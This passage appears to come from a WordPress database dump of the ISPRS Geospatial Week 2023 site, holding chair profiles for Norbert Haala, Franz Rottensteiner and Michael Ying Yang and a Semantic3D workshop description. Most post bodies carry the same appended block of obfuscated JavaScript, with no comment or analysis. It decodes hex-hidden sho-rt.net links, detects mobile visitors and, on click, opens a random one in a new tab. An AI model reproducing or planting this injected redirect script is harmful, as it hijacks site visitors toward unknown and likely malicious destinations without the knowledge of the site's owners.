_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Norbert Haala','','publish','closed','closed','','norbert-haala','','','2022-10-14 17:27:12','2022-10-14 17:27:12','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2835',0,'dt_team','',0),
(2836,1,'2022-10-14 17:23:50','2022-10-14 17:23:50','','w141','','inherit','open','closed','','w141','','','2022-10-14 17:23:50','2022-10-14 17:23:50','',2835,'https://gsw2023.com/wp-content/uploads/2022/10/w141.jpg',0,'attachment','image/jpeg',0),
(2837,1,'2022-10-14 17:24:52','2022-10-14 17:24:52','<!-- wp:paragraph -->\n<p>Leibniz University Hannover, Germany (WG II/3)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Franz Rottensteiner','','publish','closed','closed','','franz-rottensteiner','','','2022-10-14 17:27:16','2022-10-14 17:27:16','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2837',0,'dt_team','',0),
(2838,1,'2022-10-14 17:24:46','2022-10-14 17:24:46','','w142','','inherit','open','closed','','w142','','','2022-10-14 17:24:46','2022-10-14 17:24:46','',2837,'https://gsw2023.com/wp-content/uploads/2022/10/w142.jpg',0,'attachment','image/jpeg',0),
(2839,1,'2022-10-14 17:25:48','2022-10-14 17:25:48','<!-- wp:paragraph -->\n<p>University of Twente,<br>The Netherlands (WG II/5)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Michael Ying Yang','','publish','closed','closed','','michael-ying-yang','','','2022-10-14 17:28:07','2022-10-14 17:28:07','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=2839',0,'dt_team','',0),
(2840,1,'2022-10-14 17:25:38','2022-10-14 17:25:38','','w143','','inherit','open','closed','','w143','','','2022-10-14 17:25:38','2022-10-14 17:25:38','',2839,'https://gsw2023.com/wp-content/uploads/2022/10/w143.jpg',0,'attachment','image/jpeg',0),
(2841,1,'2022-10-14 17:31:05','2022-10-14 17:31:05','','m2','','inherit','open','closed','','m2-3','','','2022-10-14 17:31:05','2022-10-14 17:31:05','',2795,'https://gsw2023.com/wp-content/uploads/2022/10/m2-2.jpg',0,'attachment','image/jpeg',0),
(2842,1,'2022-10-14 17:33:09','2022-10-14 17:33:09','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2841\" img_size=\"800x800\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;\"><strong>Automated 3D reconstruction and the extraction of semantic information from images and image sequences are important research topics in Photogrammetry, Remote Sensing, GIS, and Computer Vision. This workshop is a follow-up to the first event under the same name embedded in the ISPRS Geospatial Week 2019 in Enschede. It will bring together experts working in photogrammetric 3D reconstruction, semantic interpretation of imagery and image sequence analysis to discuss recent developments, the potential of various data sources, and future trends in 3D reconstruction and information extraction from imagery. Its focus is on methodological research. Semantic3D will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"6\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"50\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"vista_blue\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68